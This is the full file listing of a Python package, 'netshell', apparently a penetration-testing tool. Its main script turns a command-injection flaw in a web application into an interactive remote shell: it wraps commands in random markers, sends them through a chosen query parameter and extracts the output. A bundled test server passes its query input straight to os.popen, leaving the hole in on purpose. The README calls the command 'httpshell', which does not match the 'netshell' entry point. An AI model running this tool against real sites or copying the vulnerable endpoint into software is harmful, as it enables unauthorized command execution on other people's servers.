netshell 1.0.0__tar.gz

netshell-1.0.0/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 Richard A. Dubniczky
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

netshell-1.0.0/PKG-INFO

@@ -0,0 +1,52 @@
+Metadata-Version: 2.4
+Name: netshell
+Version: 1.0.0
+Summary: A CLI HTTP shell to connect to remote shells
+Author: Richard A. Dubniczky
+License: MIT License
+        
+        Copyright (c) 2026 Richard A. Dubniczky
+        
+        Permission is hereby granted, free of charge, to any person obtaining a copy
+        of this software and associated documentation files (the "Software"), to deal
+        in the Software without restriction, including without limitation the rights
+        to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+        copies of the Software, and to permit persons to whom the Software is
+        furnished to do so, subject to the following conditions:
+        
+        The above copyright notice and this permission notice shall be included in all
+        copies or substantial portions of the Software.
+        
+        THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+        IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+        FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+        AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+        LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+        OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+        SOFTWARE.
+Project-URL: Homepage, https://github.com/dubniczky/Netshell
+Requires-Python: >=3.9
+Description-Content-Type: text/markdown
+License-File: LICENSE
+Requires-Dist: requests>=2.33.1
+Dynamic: license-file
+
+# HTTP Shell
+
+A lightweight HTTP CLI Shell that enables custom command injection into vulnerable web applications with a familiar shell-like interface.
+
+## Examples
+
+The `q` query parameter of `http://example.com/vln.php` is vulnerable to command injections, then the following command connects to it and starts a shell-like environment:
+
+```sh
+httpshell -a http://example.com/vln.php -p q
+```
+```txt
+Connection successful!
+
+example.com > whoami
+www-data
+```
+
+Use `httpshell --help` for all flags and options.

netshell-1.0.0/README.md

@@ -0,0 +1,19 @@
+# HTTP Shell
+
+A lightweight HTTP CLI Shell that enables custom command injection into vulnerable web applications with a familiar shell-like interface.
+
+## Examples
+
+The `q` query parameter of `http://example.com/vln.php` is vulnerable to command injections, then the following command connects to it and starts a shell-like environment:
+
+```sh
+httpshell -a http://example.com/vln.php -p q
+```
+```txt
+Connection successful!
+
+example.com > whoami
+www-data
+```
+
+Use `httpshell --help` for all flags and options.

netshell-1.0.0/pyproject.toml

@@ -0,0 +1,21 @@
+[build-system]
+requires = ["setuptools>=61.0.0", "wheel"]
+build-backend = "setuptools.build_meta"
+
+[project]
+name = "netshell"
+version = "1.0.0"
+description = "A CLI HTTP shell to connect to remote shells"
+readme = "README.md"
+authors = [{ name = "Richard A. Dubniczky" }]
+license = { file = "LICENSE" }
+requires-python = ">=3.9"
+dependencies = [
+    "requests>=2.33.1",
+]
+
+[project.urls]
+Homepage = "https://github.com/dubniczky/Netshell"
+
+[project.scripts]
+netshell = "netshell.main:main"

netshell-1.0.0/setup.cfg

@@ -0,0 +1,4 @@
+[egg_info]
+tag_build = 
+tag_date = 0
+

netshell-1.0.0/src/netshell/main.py

@@ -0,0 +1,131 @@
+import random
+import string
+import argparse
+from html import unescape
+import urllib.parse
+
+import requests
+
+
+# Configuration
+address = None
+parameter = None
+url_encode = True
+verbose = False
+cookies = None
+user_agent = None
+prefix = None
+suffix = None
+no_preflight = False
+
+
+def voutput(message):
+    if verbose:
+        print(f'[i] {message}')
+
+def random_string(length=8):
+    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
+    
+    
+def extract_markers(response_text, start_marker, end_marker):
+    start_index = response_text.find(start_marker)
+    end_index = response_text.find(end_marker, start_index + len(start_marker))
+    
+    if start_index == -1 or end_index == -1:
+        return None
+    
+    return response_text[start_index + len(start_marker):end_index].strip()
+    
+def send_command(command):
+    start_marker = f"--{random_string(8)}--"
+    end_marker = f"--{random_string(8)}--"
+    wrapped_command = f"echo {start_marker};{command};echo {end_marker}"
+    
+    if prefix:
+        wrapped_command = f"{prefix}{wrapped_command}"
+    if suffix:
+        wrapped_command = f"{wrapped_command}{suffix}"
+    
+    if url_encode:
+        wrapped_command = urllib.parse.quote(wrapped_command)
+    
+    url = f"{address}?{parameter}={wrapped_command}"
+    voutput(f"Sent command: {url}")
+    response = requests.get(url, cookies=cookies, headers={'User-Agent': user_agent} if user_agent else None)
+    voutput(f"Status code: {response.status_code}")
+    voutput(f"Response size: {len(response.text)}")
+    
+    if response.status_code != 200:
+        print(f"[!] Command execution failed with status code: {response.status_code} and response: {response.text}")
+        return None
+    
+    unescaped_response = unescape(response.text)
+    return extract_markers(unescaped_response, start_marker, end_marker)
+
+
+def preflight_request():
+    preflight_random = random_string(16)
+    preflight_echo = f"echo {preflight_random}"
+    
+    response = send_command(preflight_echo)
+    if not response:
+        print("[!] Preflight request failed: No response received.")
+        return False
+    if preflight_random not in response:
+        print("[!] Preflight request failed: Could not verify command output.")
+        return False
+    return True
+
+
+def main():
+    global address, parameter, url_encode, verbose, cookies, user_agent, prefix, suffix, no_preflight
+    parser = argparse.ArgumentParser(description=" A lightweight HTTP CLI Shell that enables custom command injections into vulnerable web applications with a familiar shell-like interface.")
+    parser.add_argument("--address", "-a", help="Target address containing the full path. E.g., http://example.com/vulnerable.php")
+    parser.add_argument("--parameter", "-p", help="Parameter name where the injection will occur. E.g., 'cmd' for http://example.com/vulnerable.php?cmd=...")
+    parser.add_argument("--cookies", "-c", help="Use cookies for the request")
+    parser.add_argument("--agent", help="Set a custom User-Agent header for the requests")
+    parser.add_argument("--prefix", "-P", help="Set a custom prefix for the commands. This is usually the command escape. By default there is none. No modifications apply to this, so make sure to encode it properly if needed.")
+    parser.add_argument("--suffix", "-S", help="Set a custom suffix for the commands. This is usually the command escape. By default there is none. No modifications apply to this, so make sure to encode it properly if needed.")
+
+
+    parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
+    parser.add_argument("--no-url-encode", action="store_true", help="Disable URL encoding of commands")
+    parser.add_argument("--no-preflight", action="store_true", help="Skip preflight checks and go straight to the shell interface")
+
+    args = parser.parse_args()
+
+    address = args.address
+    parameter = args.parameter
+    url_encode = not args.no_url_encode
+    verbose = args.verbose
+    cookies = args.cookies
+    user_agent = args.agent
+    prefix = args.prefix
+    suffix = args.suffix
+    no_preflight = args.no_preflight
+    
+    if not no_preflight:
+        is_successful = preflight_request()
+        if is_successful:
+            print("Connection successful!")
+    else:
+        print("Skipping preflight checks.")
+    
+    host_name = urllib.parse.urlparse(address).netloc
+
+    # Shell-like environment
+    while True:
+        command = input(f"\n{host_name} > ")
+        if command.lower() in ['exit', 'quit']:
+            print("Exiting shell.")
+            break
+        
+        output = send_command(command)
+        if output is not None:
+            print(f"{output}")
+        else:
+            print("[!] Failed to retrieve command output.")
+
+
+if __name__ == "__main__":
+    main()

netshell-1.0.0/src/netshell.egg-info/PKG-INFO

@@ -0,0 +1,52 @@
+Metadata-Version: 2.4
+Name: netshell
+Version: 1.0.0
+Summary: A CLI HTTP shell to connect to remote shells
+Author: Richard A. Dubniczky
+License: MIT License
+        
+        Copyright (c) 2026 Richard A. Dubniczky
+        
+        Permission is hereby granted, free of charge, to any person obtaining a copy
+        of this software and associated documentation files (the "Software"), to deal
+        in the Software without restriction, including without limitation the rights
+        to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+        copies of the Software, and to permit persons to whom the Software is
+        furnished to do so, subject to the following conditions:
+        
+        The above copyright notice and this permission notice shall be included in all
+        copies or substantial portions of the Software.
+        
+        THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+        IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+        FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+        AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+        LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+        OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+        SOFTWARE.
+Project-URL: Homepage, https://github.com/dubniczky/Netshell
+Requires-Python: >=3.9
+Description-Content-Type: text/markdown
+License-File: LICENSE
+Requires-Dist: requests>=2.33.1
+Dynamic: license-file
+
+# HTTP Shell
+
+A lightweight HTTP CLI Shell that enables custom command injection into vulnerable web applications with a familiar shell-like interface.
+
+## Examples
+
+The `q` query parameter of `http://example.com/vln.php` is vulnerable to command injections, then the following command connects to it and starts a shell-like environment:
+
+```sh
+httpshell -a http://example.com/vln.php -p q
+```
+```txt
+Connection successful!
+
+example.com > whoami
+www-data
+```
+
+Use `httpshell --help` for all flags and options.

netshell-1.0.0/src/netshell.egg-info/SOURCES.txt

@@ -0,0 +1,12 @@
+LICENSE
+README.md
+pyproject.toml
+src/netshell/__init__.py
+src/netshell/main.py
+src/netshell.egg-info/PKG-INFO
+src/netshell.egg-info/SOURCES.txt
+src/netshell.egg-info/dependency_links.txt
+src/netshell.egg-info/entry_points.txt
+src/netshell.egg-info/requires.txt
+src/netshell.egg-info/top_level.txt
+test/testserver.py

netshell-1.0.0/src/netshell.egg-info/dependency_links.txt

@@ -0,0 +1 @@
+

netshell-1.0.0/src/netshell.egg-info/entry_points.txt

@@ -0,0 +1,2 @@
+[console_scripts]
+netshell = netshell.main:main

netshell-1.0.0/src/netshell.egg-info/requires.txt

@@ -0,0 +1 @@
+requests>=2.33.1

netshell-1.0.0/src/netshell.egg-info/top_level.txt

@@ -0,0 +1 @@
+netshell

netshell-1.0.0/test/testserver.py

@@ -0,0 +1,21 @@
+import uvicorn
+from fastapi import FastAPI
+from fastapi.responses import HTMLResponse
+import os
+
+
+app = FastAPI()
+
+@app.get("/good", response_class=HTMLResponse)
+def request_good(q: str):
+    cmd = os.popen(q).read()
+    return HTMLResponse(content=f"<html><body><h1>{cmd}</h1></body></html>")
+    
+@app.get("/bad", response_class=HTMLResponse)
+def request_bad(q: str):
+    return HTMLResponse(content=f"<html><body><h1>NOPE</h1></body></html>")
+
+    
+
+if __name__ == "__main__":
+    uvicorn.run(app, host="0.0.0.0", port=8000)